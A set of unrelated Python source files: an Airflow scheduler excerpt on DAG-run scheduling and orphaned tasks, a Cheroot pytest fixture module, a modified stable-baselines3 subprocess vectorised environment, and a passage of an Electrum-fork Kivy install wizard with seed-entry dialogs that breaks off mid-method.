TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find any TIs in state SCHEDULED and try to QUEUE them (send them to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only send this metric if we obtained the lock; otherwise we'll skew the
# metric way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs to see if we are _now_ at the limit for any of
# these dags (we've just created a DagRun for them, after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Execution dates of the currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out whether we should still allow creating a new DagRun now
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Adopt or reset any TaskInstance still in a SCHEDULED, QUEUED or RUNNING state that was
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s", len(to_reset), task_instance_str
)
# Issue SQL/finish "Unit of Work", but let @provide_session commit (or if passed a session, let caller
# decide when to commit
session.flush()
return len(to_reset)
|
conftest.py
|
"""Pytest configuration module.
Contains fixtures, which are tightly bound to the Cheroot framework
itself, useless for end-users' app testing.
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import threading
import time
import pytest
from ..server import Gateway, HTTPServer
from ..testing import ( # noqa: F401
native_server, wsgi_server,
)
from ..testing import get_server_client
@pytest.fixture # noqa: F811
def wsgi_server_client(wsgi_server):
"""Create a test client out of given WSGI server."""
return get_server_client(wsgi_server)
@pytest.fixture # noqa: F811
def native_server_client(native_server):
"""Create a test client out of given HTTP server."""
return get_server_client(native_server)
@pytest.fixture
def http_server():
"""Provision a server creator as a fixture."""
def start_srv():
bind_addr = yield
httpserver = make_http_server(bind_addr)
yield httpserver
yield httpserver
srv_creator = iter(start_srv())
next(srv_creator)
yield srv_creator
try:
while True:
httpserver = next(srv_creator)
if httpserver is not None:
httpserver.stop()
except StopIteration:
pass
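# Intended usage inside a test (an assumption based on the generator protocol above):
#   httpserver = http_server.send(bind_addr)
# i.e. the test sends a bind address into the generator and receives the started server;
# teardown then drains the generator and stops any server it produced.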
def make_http_server(bind_addr):
"""Create and start an HTTP server bound to bind_addr."""
httpserver = HTTPServer(
bind_addr=bind_addr,
gateway=Gateway,
)
threading.Thread(target=httpserver.safe_start).start()
while not httpserver.ready:
time.sleep(0.1)
return httpserver
|
subproc_vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import gym
import numpy as np
from stable_baselines3.common.vec_env.base_vec_env import (
CloudpickleWrapper,
VecEnv,
VecEnvIndices,
VecEnvObs,
VecEnvStepReturn,
)
def _worker(remote: mp.connection.Connection,
parent_remote: mp.connection.Connection,
env_fn_wrapper: CloudpickleWrapper) -> None:
# Import here to avoid a circular import
from stable_baselines3.common.env_util import is_wrapped
import torch
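# Limit each worker process to a single torch thread so that many env subprocesses
# don't oversubscribe CPU cores (rationale assumed, not stated in the original).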
torch.set_num_threads(1)
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
# if done:
# # save final observation where user can get it, then reset
# info["terminal_observation"] = observation
# observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset(data)
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
elif cmd == "is_wrapped":
remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(
f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self,
env_fns: List[Callable[[], gym.Env]],
start_method: Optional[str] = None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = mp.get_context(start_method)
self.remotes, self.work_remotes = zip(
*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes,
env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(
obs,
self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self, **kwargs) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", kwargs))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
# New
def reset_arg(self, args_list, **kwargs) -> VecEnvObs:
obs = self.env_method_arg("reset", args_list, **kwargs)
return _flatten_obs(obs, self.observation_space)
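# Hypothetical example: pass one positional-argument tuple per environment, e.g.
#   obs = vec_env.reset_arg([(task,) for task in tasks])
# which forwards each tuple to the corresponding worker's env.reset(*args).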
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self,
attr_name: str,
indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self,
attr_name: str,
value: Any,
indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self,
method_name: str,
*method_args,
indices: VecEnvIndices = None,
**method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(
("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
# New
def env_method_arg(self,
method_name: str,
method_args_list,
indices: VecEnvIndices = None,
**method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for method_args, remote in zip(method_args_list, target_remotes):
remote.send(
("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self,
wrapper_class: Type[gym.Wrapper],
indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]],
space: gym.spaces.Space) -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(
obs, (list,
tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(
space.spaces,
OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(
obs[0], dict
), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs]))
for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(
obs[0], tuple
), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum_seci_gui.kivy.uix.dialogs import EventsDialog
from electrum_seci_gui.kivy.i18n import _
from electrum_seci.base_wizard import BaseWizard
from password_dialog import PasswordDialog
# global Variables
app = App.get_running_app()
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_seci_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From %d cosigners')%n.value
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require %d signatures')%m.value
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__(**kwargs)
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_seci.mnemonic import Mnemonic
from electrum_seci.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and last_word
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
text = unicode(ti.text).strip()
text = ' '.join(text.split())
return text
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
